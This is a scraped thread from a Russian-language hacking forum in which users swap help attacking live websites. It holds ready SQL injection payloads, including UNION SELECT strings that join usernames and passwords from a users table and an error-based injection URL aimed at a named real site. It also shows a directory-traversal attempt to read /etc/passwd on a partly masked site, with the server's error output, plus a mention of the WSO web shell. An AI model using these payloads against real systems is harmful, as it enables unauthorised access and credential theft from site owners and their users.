 |
|
02.07.2012, 15:26
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от kingbeef
Помогите с oracle.
Как вывести логины и пассы вместе?
union+select+null,null,password,null,null,null,nul l+from+users--
union+select+null,null,username,,null,null,null,nu ll+from+users--
По отдельности выводит.
Код:
union+select+null,null,concat(username,password),null,null,null,nul l+from+users--
Код:
union+select+null,null,(username || ':' || password)x,null,null,null,nul l+from+users--
|
|
|
02.07.2012, 19:26
|
|
Новичок
Регистрация: 02.07.2012
Сообщений: 1
С нами:
7296086
Репутация:
0
|
|
Сообщение от None
Вроде в WSO есть... не?
Но работает он только в версии с "suid".
|
|
|
|
03.07.2012, 00:16
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Del msg
|
|
|
|
03.07.2012, 00:32
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Del msg
|
|
|
|
03.07.2012, 00:41
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от Zed0x
Эмммм, в верху страницы на пол страницы)))
сори у меня чет в мозиле не было хз почему ))
а в хроме есть
|
|
|
|
03.07.2012, 11:16
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от Zed0x
Помогите подобрать колонки. При постановки ковычки вылизает ошибка базу, но почему то не получается:
http://logvinov.info/about/0/0/0/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and(1)='1
|
|
|
|
03.07.2012, 11:36
|
|
Новичок
Регистрация: 01.07.2012
Сообщений: 22
С нами:
7297526
Репутация:
0
|
|
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
|
|
|
|
03.07.2012, 14:02
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
С нами:
8957186
Репутация:
796
|
|
Сообщение от Rootz
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
Основы тут. Далее сам сообразишь, нужны начальные знания синтаксиса СУБД.
|
|
|
|
03.07.2012, 14:37
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Нашел на неком сайте LFI
Код:
http://******.ru/book_php.php?id=adminpidaras.php
Пытаюсь крутить
Код:
http://******.ru/book_php.php?id=../../../../../../../../../../../../../../../../../../../etc/passwd
Сообщение от None
Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/******/data:.) in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(/etc/passwd): failed to open stream: Operation not permitted in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(): Failed opening 'books/PHP/../../../../../../../../../../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/******/data/www/******.ru/book_php.php on line 387
Поставляю %00, и все-равно ошибка.
Подскажите что я делаю не так? |
|
|
|
03.07.2012, 14:54
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от None
Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s)
нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
